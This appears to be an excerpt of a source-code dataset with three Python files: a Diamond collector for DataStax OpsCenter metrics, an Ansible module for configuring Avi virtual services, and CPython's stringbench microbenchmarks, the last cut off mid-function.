repo_name
stringlengths 6
100
| path
stringlengths 4
294
| copies
stringlengths 1
5
| size
stringlengths 4
6
| content
stringlengths 606
896k
| license
stringclasses 15
values |
---|---|---|---|---|---|
russss/Diamond | src/collectors/dseopscenter/dseopscenter.py | 16 | 7115 | # coding=utf-8
"""
Collect the DataStax OpsCenter metrics
"""
import urllib2
import datetime
try:
import json
except ImportError:
import simplejson as json
import diamond.collector
class DseOpsCenterCollector(diamond.collector.Collector):
last_run_time = 0
column_families = None
last_schema_sync_time = 0
def get_default_config_help(self):
config_help = super(DseOpsCenterCollector,
self).get_default_config_help()
config_help.update({
'host': "",
'port': "",
'cluster_id': "Set cluster ID/name.\n",
'metrics': "You can list explicit metrics if you like,\n"
" by default all know metrics are included.\n",
'node_group': "Set node group name, any by default\n",
'default_tail_opts': "Chaning these is not recommended.",
})
return config_help
def get_default_config(self):
"""
Returns the default collector settings
"""
config = super(DseOpsCenterCollector, self).get_default_config()
metrics = [
'cf-bf-false-positives',
'cf-bf-false-ratio',
'cf-bf-space-used',
'cf-keycache-hit-rate',
'cf-keycache-hits',
'cf-keycache-requests',
'cf-live-disk-used',
'cf-live-sstables',
'cf-pending-tasks',
'cf-read-latency-op',
'cf-read-ops',
'cf-rowcache-hit-rate',
'cf-rowcache-hits',
'cf-rowcache-requests',
'cf-total-disk-used',
'cf-write-latency-op',
'cf-write-ops',
'cms-collection-count',
'cms-collection-time',
'data-load',
'heap-committed',
'heap-max',
'heap-used',
'key-cache-hit-rate',
'key-cache-hits',
'key-cache-requests',
'nonheap-committed',
'nonheap-max',
'nonheap-used',
'pending-compaction-tasks',
'pending-flush-sorter-tasks',
'pending-flushes',
'pending-gossip-tasks',
'pending-hinted-handoff',
'pending-internal-responses',
'pending-memtable-post-flushers',
'pending-migrations',
'pending-misc-tasks',
'pending-read-ops',
'pending-read-repair-tasks',
'pending-repair-tasks',
'pending-repl-on-write-tasks',
'pending-request-responses',
'pending-streams',
'pending-write-ops',
'read-latency-op',
'read-ops',
'row-cache-hit-rate',
'row-cache-hits',
'row-cache-requests',
'solr-avg-time-per-req',
'solr-errors',
'solr-requests',
'solr-timeouts',
'total-bytes-compacted',
'total-compactions-completed',
'write-latency-op',
'write-ops',
]
config.update({
'host': '127.0.0.1',
'port': 8888,
'path': 'cassandra',
'node_group': '*',
'metrics': ','.join(metrics),
'default_tail_opts': '&forecast=0&node_aggregation=1',
})
return config
def _get_schema(self):
time_now = int(datetime.datetime.utcnow().strftime('%s'))
if ((self.column_families is None or
(time_now - self.last_schema_sync_time < 3600))):
return False
url = 'http://%s:%i/%s/keyspaces' % (self.config['host'],
int(self.config['port']),
self.config['cluster_id'])
try:
response = urllib2.urlopen(url)
except Exception, err:
self.log.error('%s: %s', url, err)
return False
try:
result = json.load(response)
column_families = []
for ks in result:
i = []
for cf in result[ks]['column_families']:
i.append("%s.%s" % (ks, cf))
column_families.append(i)
self.column_families = ','.join(sum(column_families, []))
self.log.debug('DseOpsCenterCollector columnfamilies = %s',
self.column_families)
self.last_schema_sync_time = time_now
return True
except (TypeError, ValueError):
self.log.error(
"Unable to parse response from opscenter as a json object")
return False
def _get(self, start, end, step=60):
self._get_schema()
url = ('http://%s:%i/%s/new-metrics?node_group=%s&columnfamilies=%s'
'&metrics=%s&start=%i&end=%i&step=%i%s') % (
self.config['host'],
int(self.config['port']),
self.config['cluster_id'],
self.config['node_group'],
self.column_families,
self.config['metrics'],
start, end, step,
self.config['default_tail_opts'])
try:
response = urllib2.urlopen(url)
except Exception, err:
self.log.error('%s: %s', url, err)
return False
self.log.debug('DseOpsCenterCollector metrics url = %s', url)
try:
return json.load(response)
except (TypeError, ValueError):
self.log.error(
"Unable to parse response from opscenter as a json object")
return False
def collect(self):
metrics = {}
if json is None:
self.log.error('Unable to import json')
return None
time_now = int(datetime.datetime.utcnow().strftime('%s'))
self.log.debug('DseOpsCenterCollector last_run_time = %i',
self.last_run_time)
if self.last_run_time == 0:
self.last_run_time = time_now - 60
if time_now - self.last_run_time >= 60:
result = self._get(self.last_run_time, time_now)
self.last_run_time = time_now
if not result:
return None
self.log.debug('DseOpsCenterCollector result = %s', result)
for data in result['data'][self.config['node_group']]:
if data['data-points'][0][0] is not None:
if 'columnfamily' in data:
k = '.'.join([data['metric'],
data['columnfamily']])
metrics[k] = data['data-points'][0][0]
else:
metrics[data['metric']] = data['data-points'][0][0]
self.log.debug('DseOpsCenterCollector metrics = %s', metrics)
for key in metrics:
self.publish(key, metrics[key])
else:
self.log.debug(
"DseOpsCenterCollector can only run once every minute")
return None
| mit |
adityacs/ansible | lib/ansible/modules/network/avi/avi_virtualservice.py | 8 | 20685 | #!/usr/bin/python
#
# Created on Aug 25, 2016
# @author: Gaurav Rastogi ([email protected])
# Eric Anderson ([email protected])
# module_check: supported
# Avi Version: 16.3.8
#
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'status': ['preview'], 'supported_by': 'community', 'version': '1.0'}
DOCUMENTATION = '''
---
module: avi_virtualservice
author: Gaurav Rastogi ([email protected])
short_description: Module for setup of VirtualService Avi RESTful Object
description:
- This module is used to configure VirtualService object
- more examples at U(https://github.com/avinetworks/devops)
requirements: [ avisdk ]
version_added: "2.3"
options:
state:
description:
- The state that should be applied on the entity.
default: present
choices: ["absent","present"]
active_standby_se_tag:
description:
- This configuration only applies if the virtualservice is in legacy active standby ha mode and load distribution among active standby is enabled.
- This field is used to tag the virtualservice so that virtualservices with the same tag will share the same active serviceengine.
- Virtualservices with different tags will have different active serviceengines.
- If one of the serviceengine's in the serviceenginegroup fails, all virtualservices will end up using the same active serviceengine.
- Redistribution of the virtualservices can be either manual or automated when the failed serviceengine recovers.
- Redistribution is based on the auto redistribute property of the serviceenginegroup.
- Default value when not specified in API or module is interpreted by Avi Controller as ACTIVE_STANDBY_SE_1.
analytics_policy:
description:
- Determines analytics settings for the application.
analytics_profile_ref:
description:
- Specifies settings related to analytics.
- It is a reference to an object of type analyticsprofile.
application_profile_ref:
description:
- Enable application layer specific features for the virtual service.
- It is a reference to an object of type applicationprofile.
auto_allocate_floating_ip:
description:
- Auto-allocate floating/elastic ip from the cloud infrastructure.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
auto_allocate_ip:
description:
- Auto-allocate vip from the provided subnet.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
availability_zone:
description:
- Availability-zone to place the virtual service.
avi_allocated_fip:
description:
- (internal-use) fip allocated by avi in the cloud infrastructure.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
avi_allocated_vip:
description:
- (internal-use) vip allocated by avi in the cloud infrastructure.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
client_auth:
description:
- Http authentication configuration for protected resources.
cloud_config_cksum:
description:
- Checksum of cloud configuration for vs.
- Internally set by cloud connector.
cloud_ref:
description:
- It is a reference to an object of type cloud.
cloud_type:
description:
- Cloud_type of virtualservice.
- Default value when not specified in API or module is interpreted by Avi Controller as CLOUD_NONE.
connections_rate_limit:
description:
- Rate limit the incoming connections to this virtual service.
content_rewrite:
description:
- Profile used to match and rewrite strings in request and/or response body.
created_by:
description:
- Creator name.
delay_fairness:
description:
- Select the algorithm for qos fairness.
- This determines how multiple virtual services sharing the same service engines will prioritize traffic over a congested network.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
description:
description:
- User defined description for the object.
discovered_network_ref:
description:
- (internal-use) discovered networks providing reachability for client facing virtual service ip.
- This field is deprecated.
- It is a reference to an object of type network.
discovered_networks:
description:
- (internal-use) discovered networks providing reachability for client facing virtual service ip.
- This field is used internally by avi, not editable by the user.
discovered_subnet:
description:
- (internal-use) discovered subnets providing reachability for client facing virtual service ip.
- This field is deprecated.
dns_info:
description:
- Service discovery specific data including fully qualified domain name, type and time-to-live of the dns record.
- Note that only one of fqdn and dns_info setting is allowed.
east_west_placement:
description:
- Force placement on all se's in service group (mesos mode only).
- Default value when not specified in API or module is interpreted by Avi Controller as False.
enable_autogw:
description:
- Response traffic to clients will be sent back to the source mac address of the connection, rather than statically sent to a default gateway.
- Default value when not specified in API or module is interpreted by Avi Controller as True.
enable_rhi:
description:
- Enable route health injection using the bgp config in the vrf context.
enable_rhi_snat:
description:
- Enable route health injection for source nat'ted floating ip address using the bgp config in the vrf context.
enabled:
description:
- Enable or disable the virtual service.
- Default value when not specified in API or module is interpreted by Avi Controller as True.
floating_ip:
description:
- Floating ip to associate with this virtual service.
floating_subnet_uuid:
description:
- If auto_allocate_floating_ip is true and more than one floating-ip subnets exist, then the subnet for the floating ip address allocation.
- This field is applicable only if the virtualservice belongs to an openstack or aws cloud.
- In openstack or aws cloud it is required when auto_allocate_floating_ip is selected.
flow_dist:
description:
- Criteria for flow distribution among ses.
- Default value when not specified in API or module is interpreted by Avi Controller as LOAD_AWARE.
flow_label_type:
description:
- Criteria for flow labelling.
- Default value when not specified in API or module is interpreted by Avi Controller as NO_LABEL.
fqdn:
description:
- Dns resolvable, fully qualified domain name of the virtualservice.
- Only one of 'fqdn' and 'dns_info' configuration is allowed.
host_name_xlate:
description:
- Translate the host name sent to the servers to this value.
- Translate the host name sent from servers back to the value used by the client.
http_policies:
description:
- Http policies applied on the data traffic of the virtual service.
ign_pool_net_reach:
description:
- Ignore pool servers network reachability constraints for virtual service placement.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
ip_address:
description:
- Ip address of the virtual service.
ipam_network_subnet:
description:
- Subnet and/or network for allocating virtualservice ip by ipam provider module.
limit_doser:
description:
- Limit potential dos attackers who exceed max_cps_per_client significantly to a fraction of max_cps_per_client for a while.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
max_cps_per_client:
description:
- Maximum connections per second per client ip.
- Default value when not specified in API or module is interpreted by Avi Controller as 0.
microservice_ref:
description:
- Microservice representing the virtual service.
- It is a reference to an object of type microservice.
name:
description:
- Name for the virtual service.
required: true
network_profile_ref:
description:
- Determines network settings such as protocol, tcp or udp, and related options for the protocol.
- It is a reference to an object of type networkprofile.
network_ref:
description:
- Manually override the network on which the virtual service is placed.
- It is a reference to an object of type network.
network_security_policy_ref:
description:
- Network security policies for the virtual service.
- It is a reference to an object of type networksecuritypolicy.
performance_limits:
description:
- Optional settings that determine performance limits like max connections or bandwdith etc.
pool_group_ref:
description:
- The pool group is an object that contains pools.
- It is a reference to an object of type poolgroup.
pool_ref:
description:
- The pool is an object that contains destination servers and related attributes such as load-balancing and persistence.
- It is a reference to an object of type pool.
port_uuid:
description:
- (internal-use) network port assigned to the virtual service ip address.
remove_listening_port_on_vs_down:
description:
- Remove listening port if virtualservice is down.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
requests_rate_limit:
description:
- Rate limit the incoming requests to this virtual service.
scaleout_ecmp:
description:
- Disable re-distribution of flows across service engines for a virtual service.
- Enable if the network itself performs flow hashing with ecmp in environments such as gcp.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
se_group_ref:
description:
- The service engine group to use for this virtual service.
- Moving to a new se group is disruptive to existing connections for this vs.
- It is a reference to an object of type serviceenginegroup.
server_network_profile_ref:
description:
- Determines the network settings profile for the server side of tcp proxied connections.
- Leave blank to use the same settings as the client to vs side of the connection.
- It is a reference to an object of type networkprofile.
service_pool_select:
description:
- Select pool based on destination port.
services:
description:
- List of services defined for this virtual service.
snat_ip:
description:
- Nat'ted floating source ip address(es) for upstream connection to servers.
ssl_key_and_certificate_refs:
description:
- Select or create one or two certificates, ec and/or rsa, that will be presented to ssl/tls terminated connections.
- It is a reference to an object of type sslkeyandcertificate.
ssl_profile_ref:
description:
- Determines the set of ssl versions and ciphers to accept for ssl/tls terminated connections.
- It is a reference to an object of type sslprofile.
ssl_sess_cache_avg_size:
description:
- Expected number of ssl session cache entries (may be exceeded).
- Default value when not specified in API or module is interpreted by Avi Controller as 1024.
static_dns_records:
description:
- List of static dns records applied to this virtual service.
- These are static entries and no health monitoring is performed against the ip addresses.
subnet:
description:
- Subnet providing reachability for client facing virtual service ip.
subnet_uuid:
description:
- It represents subnet for the virtual service ip address allocation when auto_allocate_ip is true.it is only applicable in openstack or aws cloud.
- This field is required if auto_allocate_ip is true.
tenant_ref:
description:
- It is a reference to an object of type tenant.
type:
description:
- Specify if this is a normal virtual service, or if it is the parent or child of an sni-enabled virtual hosted virtual service.
- Default value when not specified in API or module is interpreted by Avi Controller as VS_TYPE_NORMAL.
url:
description:
- Avi controller URL of the object.
use_bridge_ip_as_vip:
description:
- Use bridge ip as vip on each host in mesos deployments.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
uuid:
description:
- Uuid of the virtualservice.
vh_domain_name:
description:
- The exact name requested from the client's sni-enabled tls hello domain name field.
- If this is a match, the parent vs will forward the connection to this child vs.
vh_parent_vs_uuid:
description:
- Specifies the virtual service acting as virtual hosting (sni) parent.
vrf_context_ref:
description:
- Virtual routing context that the virtual service is bound to.
- This is used to provide the isolation of the set of networks the application is attached to.
- It is a reference to an object of type vrfcontext.
vs_datascripts:
description:
- Datascripts applied on the data traffic of the virtual service.
weight:
description:
- The quality of service weight to assign to traffic transmitted from this virtual service.
- A higher weight will prioritize traffic versus other virtual services sharing the same service engines.
- Default value when not specified in API or module is interpreted by Avi Controller as 1.
extends_documentation_fragment:
- avi
'''
EXAMPLES = '''
- name: Create SSL Virtual Service using Pool testpool2
avi_virtualservice:
controller: 10.10.27.90
username: admin
password: AviNetworks123!
name: newtestvs
state: present
performance_limits:
max_concurrent_connections: 1000
services:
- port: 443
enable_ssl: true
- port: 80
ssl_profile_ref: '/api/sslprofile?name=System-Standard'
application_profile_ref: '/api/applicationprofile?name=System-Secure-HTTP'
ssl_key_and_certificate_refs:
- '/api/sslkeyandcertificate?name=System-Default-Cert'
ip_address:
addr: 10.90.131.103
type: V4
pool_ref: '/api/pool?name=testpool2'
'''
RETURN = '''
obj:
description: VirtualService (api/virtualservice) object
returned: success, changed
type: dict
'''
from ansible.module_utils.basic import AnsibleModule
try:
from ansible.module_utils.avi import (
avi_common_argument_spec, HAS_AVI, avi_ansible_api)
except ImportError:
HAS_AVI = False
def main():
argument_specs = dict(
state=dict(default='present',
choices=['absent', 'present']),
active_standby_se_tag=dict(type='str',),
analytics_policy=dict(type='dict',),
analytics_profile_ref=dict(type='str',),
application_profile_ref=dict(type='str',),
auto_allocate_floating_ip=dict(type='bool',),
auto_allocate_ip=dict(type='bool',),
availability_zone=dict(type='str',),
avi_allocated_fip=dict(type='bool',),
avi_allocated_vip=dict(type='bool',),
client_auth=dict(type='dict',),
cloud_config_cksum=dict(type='str',),
cloud_ref=dict(type='str',),
cloud_type=dict(type='str',),
connections_rate_limit=dict(type='dict',),
content_rewrite=dict(type='dict',),
created_by=dict(type='str',),
delay_fairness=dict(type='bool',),
description=dict(type='str',),
discovered_network_ref=dict(type='list',),
discovered_networks=dict(type='list',),
discovered_subnet=dict(type='list',),
dns_info=dict(type='list',),
east_west_placement=dict(type='bool',),
enable_autogw=dict(type='bool',),
enable_rhi=dict(type='bool',),
enable_rhi_snat=dict(type='bool',),
enabled=dict(type='bool',),
floating_ip=dict(type='dict',),
floating_subnet_uuid=dict(type='str',),
flow_dist=dict(type='str',),
flow_label_type=dict(type='str',),
fqdn=dict(type='str',),
host_name_xlate=dict(type='str',),
http_policies=dict(type='list',),
ign_pool_net_reach=dict(type='bool',),
ip_address=dict(type='dict',),
ipam_network_subnet=dict(type='dict',),
limit_doser=dict(type='bool',),
max_cps_per_client=dict(type='int',),
microservice_ref=dict(type='str',),
name=dict(type='str', required=True),
network_profile_ref=dict(type='str',),
network_ref=dict(type='str',),
network_security_policy_ref=dict(type='str',),
performance_limits=dict(type='dict',),
pool_group_ref=dict(type='str',),
pool_ref=dict(type='str',),
port_uuid=dict(type='str',),
remove_listening_port_on_vs_down=dict(type='bool',),
requests_rate_limit=dict(type='dict',),
scaleout_ecmp=dict(type='bool',),
se_group_ref=dict(type='str',),
server_network_profile_ref=dict(type='str',),
service_pool_select=dict(type='list',),
services=dict(type='list',),
snat_ip=dict(type='list',),
ssl_key_and_certificate_refs=dict(type='list',),
ssl_profile_ref=dict(type='str',),
ssl_sess_cache_avg_size=dict(type='int',),
static_dns_records=dict(type='list',),
subnet=dict(type='dict',),
subnet_uuid=dict(type='str',),
tenant_ref=dict(type='str',),
type=dict(type='str',),
url=dict(type='str',),
use_bridge_ip_as_vip=dict(type='bool',),
uuid=dict(type='str',),
vh_domain_name=dict(type='list',),
vh_parent_vs_uuid=dict(type='str',),
vrf_context_ref=dict(type='str',),
vs_datascripts=dict(type='list',),
weight=dict(type='int',),
)
argument_specs.update(avi_common_argument_spec())
module = AnsibleModule(
argument_spec=argument_specs, supports_check_mode=True)
if not HAS_AVI:
return module.fail_json(msg=(
'Avi python API SDK (avisdk>=16.3.5.post1) is not installed. '
'For more details visit https://github.com/avinetworks/sdk.'))
return avi_ansible_api(module, 'virtualservice',
set([]))
if __name__ == '__main__':
main()
| gpl-3.0 |
tpsatish95/Python-Workshop | Python Environment Setup/Alternate/1. Python/1. Installer/Python-3.4.0(Linux)/Tools/stringbench/stringbench.py | 51 | 44018 |
# Various microbenchmarks comparing unicode and byte string performance
# Please keep this file both 2.x and 3.x compatible!
import timeit
import itertools
import operator
import re
import sys
import datetime
import optparse
VERSION = '2.0'
def p(*args):
sys.stdout.write(' '.join(str(s) for s in args) + '\n')
if sys.version_info >= (3,):
BYTES = bytes_from_str = lambda x: x.encode('ascii')
UNICODE = unicode_from_str = lambda x: x
else:
BYTES = bytes_from_str = lambda x: x
UNICODE = unicode_from_str = lambda x: x.decode('ascii')
class UnsupportedType(TypeError):
pass
p('stringbench v%s' % VERSION)
p(sys.version)
p(datetime.datetime.now())
REPEAT = 1
REPEAT = 3
#REPEAT = 7
if __name__ != "__main__":
raise SystemExit("Must run as main program")
parser = optparse.OptionParser()
parser.add_option("-R", "--skip-re", dest="skip_re",
action="store_true",
help="skip regular expression tests")
parser.add_option("-8", "--8-bit", dest="bytes_only",
action="store_true",
help="only do 8-bit string benchmarks")
parser.add_option("-u", "--unicode", dest="unicode_only",
action="store_true",
help="only do Unicode string benchmarks")
_RANGE_1000 = list(range(1000))
_RANGE_100 = list(range(100))
_RANGE_10 = list(range(10))
dups = {}
def bench(s, group, repeat_count):
def blah(f):
if f.__name__ in dups:
raise AssertionError("Multiple functions with same name: %r" %
(f.__name__,))
dups[f.__name__] = 1
f.comment = s
f.is_bench = True
f.group = group
f.repeat_count = repeat_count
return f
return blah
def uses_re(f):
f.uses_re = True
####### 'in' comparisons
@bench('"A" in "A"*1000', "early match, single character", 1000)
def in_test_quick_match_single_character(STR):
s1 = STR("A" * 1000)
s2 = STR("A")
for x in _RANGE_1000:
s2 in s1
@bench('"B" in "A"*1000', "no match, single character", 1000)
def in_test_no_match_single_character(STR):
s1 = STR("A" * 1000)
s2 = STR("B")
for x in _RANGE_1000:
s2 in s1
@bench('"AB" in "AB"*1000', "early match, two characters", 1000)
def in_test_quick_match_two_characters(STR):
s1 = STR("AB" * 1000)
s2 = STR("AB")
for x in _RANGE_1000:
s2 in s1
@bench('"BC" in "AB"*1000', "no match, two characters", 1000)
def in_test_no_match_two_character(STR):
s1 = STR("AB" * 1000)
s2 = STR("BC")
for x in _RANGE_1000:
s2 in s1
@bench('"BC" in ("AB"*300+"C")', "late match, two characters", 1000)
def in_test_slow_match_two_characters(STR):
s1 = STR("AB" * 300+"C")
s2 = STR("BC")
for x in _RANGE_1000:
s2 in s1
@bench('s="ABC"*33; (s+"E") in ((s+"D")*300+s+"E")',
"late match, 100 characters", 100)
def in_test_slow_match_100_characters(STR):
m = STR("ABC"*33)
d = STR("D")
e = STR("E")
s1 = (m+d)*300 + m+e
s2 = m+e
for x in _RANGE_100:
s2 in s1
# Try with regex
@uses_re
@bench('s="ABC"*33; re.compile(s+"D").search((s+"D")*300+s+"E")',
"late match, 100 characters", 100)
def re_test_slow_match_100_characters(STR):
m = STR("ABC"*33)
d = STR("D")
e = STR("E")
s1 = (m+d)*300 + m+e
s2 = m+e
pat = re.compile(s2)
search = pat.search
for x in _RANGE_100:
search(s1)
#### same tests as 'in' but use 'find'
@bench('("A"*1000).find("A")', "early match, single character", 1000)
def find_test_quick_match_single_character(STR):
s1 = STR("A" * 1000)
s2 = STR("A")
s1_find = s1.find
for x in _RANGE_1000:
s1_find(s2)
@bench('("A"*1000).find("B")', "no match, single character", 1000)
def find_test_no_match_single_character(STR):
s1 = STR("A" * 1000)
s2 = STR("B")
s1_find = s1.find
for x in _RANGE_1000:
s1_find(s2)
@bench('("AB"*1000).find("AB")', "early match, two characters", 1000)
def find_test_quick_match_two_characters(STR):
s1 = STR("AB" * 1000)
s2 = STR("AB")
s1_find = s1.find
for x in _RANGE_1000:
s1_find(s2)
@bench('("AB"*1000).find("BC")', "no match, two characters", 1000)
def find_test_no_match_two_character(STR):
s1 = STR("AB" * 1000)
s2 = STR("BC")
s1_find = s1.find
for x in _RANGE_1000:
s1_find(s2)
@bench('("AB"*1000).find("CA")', "no match, two characters", 1000)
def find_test_no_match_two_character_bis(STR):
s1 = STR("AB" * 1000)
s2 = STR("CA")
s1_find = s1.find
for x in _RANGE_1000:
s1_find(s2)
@bench('("AB"*300+"C").find("BC")', "late match, two characters", 1000)
def find_test_slow_match_two_characters(STR):
s1 = STR("AB" * 300+"C")
s2 = STR("BC")
s1_find = s1.find
for x in _RANGE_1000:
s1_find(s2)
@bench('("AB"*300+"CA").find("CA")', "late match, two characters", 1000)
def find_test_slow_match_two_characters_bis(STR):
s1 = STR("AB" * 300+"CA")
s2 = STR("CA")
s1_find = s1.find
for x in _RANGE_1000:
s1_find(s2)
@bench('s="ABC"*33; ((s+"D")*500+s+"E").find(s+"E")',
"late match, 100 characters", 100)
def find_test_slow_match_100_characters(STR):
m = STR("ABC"*33)
d = STR("D")
e = STR("E")
s1 = (m+d)*500 + m+e
s2 = m+e
s1_find = s1.find
for x in _RANGE_100:
s1_find(s2)
@bench('s="ABC"*33; ((s+"D")*500+"E"+s).find("E"+s)',
"late match, 100 characters", 100)
def find_test_slow_match_100_characters_bis(STR):
m = STR("ABC"*33)
d = STR("D")
e = STR("E")
s1 = (m+d)*500 + e+m
s2 = e+m
s1_find = s1.find
for x in _RANGE_100:
s1_find(s2)
#### Same tests for 'rfind'
@bench('("A"*1000).rfind("A")', "early match, single character", 1000)
def rfind_test_quick_match_single_character(STR):
s1 = STR("A" * 1000)
s2 = STR("A")
s1_rfind = s1.rfind
for x in _RANGE_1000:
s1_rfind(s2)
@bench('("A"*1000).rfind("B")', "no match, single character", 1000)
def rfind_test_no_match_single_character(STR):
s1 = STR("A" * 1000)
s2 = STR("B")
s1_rfind = s1.rfind
for x in _RANGE_1000:
s1_rfind(s2)
@bench('("AB"*1000).rfind("AB")', "early match, two characters", 1000)
def rfind_test_quick_match_two_characters(STR):
s1 = STR("AB" * 1000)
s2 = STR("AB")
s1_rfind = s1.rfind
for x in _RANGE_1000:
s1_rfind(s2)
@bench('("AB"*1000).rfind("BC")', "no match, two characters", 1000)
def rfind_test_no_match_two_character(STR):
s1 = STR("AB" * 1000)
s2 = STR("BC")
s1_rfind = s1.rfind
for x in _RANGE_1000:
s1_rfind(s2)
@bench('("AB"*1000).rfind("CA")', "no match, two characters", 1000)
def rfind_test_no_match_two_character_bis(STR):
s1 = STR("AB" * 1000)
s2 = STR("CA")
s1_rfind = s1.rfind
for x in _RANGE_1000:
s1_rfind(s2)
@bench('("C"+"AB"*300).rfind("CA")', "late match, two characters", 1000)
def rfind_test_slow_match_two_characters(STR):
s1 = STR("C" + "AB" * 300)
s2 = STR("CA")
s1_rfind = s1.rfind
for x in _RANGE_1000:
s1_rfind(s2)
@bench('("BC"+"AB"*300).rfind("BC")', "late match, two characters", 1000)
def rfind_test_slow_match_two_characters_bis(STR):
s1 = STR("BC" + "AB" * 300)
s2 = STR("BC")
s1_rfind = s1.rfind
for x in _RANGE_1000:
s1_rfind(s2)
@bench('s="ABC"*33; ("E"+s+("D"+s)*500).rfind("E"+s)',
"late match, 100 characters", 100)
def rfind_test_slow_match_100_characters(STR):
m = STR("ABC"*33)
d = STR("D")
e = STR("E")
s1 = e+m + (d+m)*500
s2 = e+m
s1_rfind = s1.rfind
for x in _RANGE_100:
s1_rfind(s2)
@bench('s="ABC"*33; (s+"E"+("D"+s)*500).rfind(s+"E")',
"late match, 100 characters", 100)
def rfind_test_slow_match_100_characters_bis(STR):
m = STR("ABC"*33)
d = STR("D")
e = STR("E")
s1 = m+e + (d+m)*500
s2 = m+e
s1_rfind = s1.rfind
for x in _RANGE_100:
s1_rfind(s2)
#### Now with index.
# Skip the ones which fail because that would include exception overhead.
@bench('("A"*1000).index("A")', "early match, single character", 1000)
def index_test_quick_match_single_character(STR):
s1 = STR("A" * 1000)
s2 = STR("A")
s1_index = s1.index
for x in _RANGE_1000:
s1_index(s2)
@bench('("AB"*1000).index("AB")', "early match, two characters", 1000)
def index_test_quick_match_two_characters(STR):
s1 = STR("AB" * 1000)
s2 = STR("AB")
s1_index = s1.index
for x in _RANGE_1000:
s1_index(s2)
@bench('("AB"*300+"C").index("BC")', "late match, two characters", 1000)
def index_test_slow_match_two_characters(STR):
s1 = STR("AB" * 300+"C")
s2 = STR("BC")
s1_index = s1.index
for x in _RANGE_1000:
s1_index(s2)
@bench('s="ABC"*33; ((s+"D")*500+s+"E").index(s+"E")',
"late match, 100 characters", 100)
def index_test_slow_match_100_characters(STR):
m = STR("ABC"*33)
d = STR("D")
e = STR("E")
s1 = (m+d)*500 + m+e
s2 = m+e
s1_index = s1.index
for x in _RANGE_100:
s1_index(s2)
#### Same for rindex
@bench('("A"*1000).rindex("A")', "early match, single character", 1000)
def rindex_test_quick_match_single_character(STR):
s1 = STR("A" * 1000)
s2 = STR("A")
s1_rindex = s1.rindex
for x in _RANGE_1000:
s1_rindex(s2)
@bench('("AB"*1000).rindex("AB")', "early match, two characters", 1000)
def rindex_test_quick_match_two_characters(STR):
s1 = STR("AB" * 1000)
s2 = STR("AB")
s1_rindex = s1.rindex
for x in _RANGE_1000:
s1_rindex(s2)
@bench('("C"+"AB"*300).rindex("CA")', "late match, two characters", 1000)
def rindex_test_slow_match_two_characters(STR):
s1 = STR("C" + "AB" * 300)
s2 = STR("CA")
s1_rindex = s1.rindex
for x in _RANGE_1000:
s1_rindex(s2)
@bench('s="ABC"*33; ("E"+s+("D"+s)*500).rindex("E"+s)',
"late match, 100 characters", 100)
def rindex_test_slow_match_100_characters(STR):
m = STR("ABC"*33)
d = STR("D")
e = STR("E")
s1 = e + m + (d+m)*500
s2 = e + m
s1_rindex = s1.rindex
for x in _RANGE_100:
s1_rindex(s2)
#### Same for partition
@bench('("A"*1000).partition("A")', "early match, single character", 1000)
def partition_test_quick_match_single_character(STR):
s1 = STR("A" * 1000)
s2 = STR("A")
s1_partition = s1.partition
for x in _RANGE_1000:
s1_partition(s2)
@bench('("A"*1000).partition("B")', "no match, single character", 1000)
def partition_test_no_match_single_character(STR):
s1 = STR("A" * 1000)
s2 = STR("B")
s1_partition = s1.partition
for x in _RANGE_1000:
s1_partition(s2)
@bench('("AB"*1000).partition("AB")', "early match, two characters", 1000)
def partition_test_quick_match_two_characters(STR):
s1 = STR("AB" * 1000)
s2 = STR("AB")
s1_partition = s1.partition
for x in _RANGE_1000:
s1_partition(s2)
@bench('("AB"*1000).partition("BC")', "no match, two characters", 1000)
def partition_test_no_match_two_character(STR):
s1 = STR("AB" * 1000)
s2 = STR("BC")
s1_partition = s1.partition
for x in _RANGE_1000:
s1_partition(s2)
@bench('("AB"*300+"C").partition("BC")', "late match, two characters", 1000)
def partition_test_slow_match_two_characters(STR):
s1 = STR("AB" * 300+"C")
s2 = STR("BC")
s1_partition = s1.partition
for x in _RANGE_1000:
s1_partition(s2)
@bench('s="ABC"*33; ((s+"D")*500+s+"E").partition(s+"E")',
"late match, 100 characters", 100)
def partition_test_slow_match_100_characters(STR):
m = STR("ABC"*33)
d = STR("D")
e = STR("E")
s1 = (m+d)*500 + m+e
s2 = m+e
s1_partition = s1.partition
for x in _RANGE_100:
s1_partition(s2)
#### Same for rpartition
@bench('("A"*1000).rpartition("A")', "early match, single character", 1000)
def rpartition_test_quick_match_single_character(STR):
s1 = STR("A" * 1000)
s2 = STR("A")
s1_rpartition = s1.rpartition
for x in _RANGE_1000:
s1_rpartition(s2)
@bench('("A"*1000).rpartition("B")', "no match, single character", 1000)
def rpartition_test_no_match_single_character(STR):
s1 = STR("A" * 1000)
s2 = STR("B")
s1_rpartition = s1.rpartition
for x in _RANGE_1000:
s1_rpartition(s2)
@bench('("AB"*1000).rpartition("AB")', "early match, two characters", 1000)
def rpartition_test_quick_match_two_characters(STR):
s1 = STR("AB" * 1000)
s2 = STR("AB")
s1_rpartition = s1.rpartition
for x in _RANGE_1000:
s1_rpartition(s2)
@bench('("AB"*1000).rpartition("BC")', "no match, two characters", 1000)
def rpartition_test_no_match_two_character(STR):
s1 = STR("AB" * 1000)
s2 = STR("BC")
s1_rpartition = s1.rpartition
for x in _RANGE_1000:
s1_rpartition(s2)
@bench('("C"+"AB"*300).rpartition("CA")', "late match, two characters", 1000)
def rpartition_test_slow_match_two_characters(STR):
s1 = STR("C" + "AB" * 300)
s2 = STR("CA")
s1_rpartition = s1.rpartition
for x in _RANGE_1000:
